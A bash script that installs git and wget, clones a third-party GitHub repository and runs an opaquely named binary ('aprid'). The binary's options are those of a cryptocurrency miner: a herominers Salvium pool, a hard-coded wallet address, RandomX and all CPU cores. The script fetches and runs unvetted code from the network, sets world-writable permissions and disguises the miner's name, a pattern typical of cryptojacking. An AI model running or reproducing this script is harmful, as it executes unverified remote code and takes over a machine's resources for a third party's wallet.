#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://github.com/nonibihan/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvsBkggaZbHsXJoYQnuhZeaQD8aKjXqP882vZmTBkneBdrZw9KH1BfkcaD16GEitJSDmteoTsYVH2CVXZz2NbuVuR8qhi4ueV -p latud -a rx/0 -k -t $(nproc --all)
